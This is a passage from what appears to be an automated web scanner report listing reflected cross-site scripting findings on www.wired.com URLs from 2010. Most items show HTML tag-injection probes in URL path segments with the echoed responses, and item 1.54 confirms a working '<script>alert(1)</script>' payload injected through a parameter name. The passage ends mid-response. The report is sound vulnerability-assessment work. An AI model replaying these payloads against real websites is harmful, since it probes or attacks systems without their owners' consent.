User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:24 GMT
Date: Sun, 21 Nov 2010 23:06:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art4d542"><a>e8d21a02e71">
...[SNIP]...

1.45. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture86153"><a>a16e375242b ss_art c_magazine">
...[SNIP]...

1.46. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29283
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:41 GMT
Date: Sun, 21 Nov 2010 23:06:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine">
...[SNIP]...

1.47. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=556
Expires: Sun, 21 Nov 2010 23:16:11 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine8e1d9"><a>1df8fb955e1">
...[SNIP]...

1.48. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26ce"><a>beebd8a9cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec26ce"><a>beebd8a9cd7/art/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec26ce"><a>beebd8a9cd7 ss_art c_magazine">
...[SNIP]...

1.49. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a6e"><a>642ea85b965 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc4a6e"><a>642ea85b965/magazine/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=581
Expires: Sun, 21 Nov 2010 23:16:23 GMT
Date: Sun, 21 Nov 2010 23:06:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc4a6e"><a>642ea85b965 c_magazine">
...[SNIP]...

1.50. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/16-09/ff_xray

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a844"><a>403dadf803e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine2a844"><a>403dadf803e/16-09/ff_xray HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=546
Expires: Sun, 21 Nov 2010 23:16:05 GMT
Date: Sun, 21 Nov 2010 23:06:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_magazine2a844"><a>403dadf803e">
...[SNIP]...

1.51. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fa5"><a>049ef037e84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture72fa5"><a>049ef037e84/art/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture72fa5"><a>049ef037e84 ss_art c_multimedia">
...[SNIP]...

1.52. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f72b"><a>f7633aef4b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art3f72b"><a>f7633aef4b8/multimedia/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:09 GMT
Date: Sun, 21 Nov 2010 23:07:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art3f72b"><a>f7633aef4b8 c_multimedia">
...[SNIP]...

1.53. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851a2"><a>7554777a3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia851a2"><a>7554777a3ab/2008/05/gallery_faves_transportation_photos HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:23 GMT
Date: Sun, 21 Nov 2010 23:07:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab">
...[SNIP]...

1.54. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/05/gallery_faves_transportation_photos

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.55. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:17 GMT
Date: Sun, 21 Nov 2010 21:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia">
...[SNIP]...

1.56. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:35 GMT
Date: Sun, 21 Nov 2010 21:59:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia">
...[SNIP]...

1.57. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:48 GMT
Date: Sun, 21 Nov 2010 21:59:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c">
...[SNIP]...

1.58. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia">
...[SNIP]...

1.59. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:18 GMT
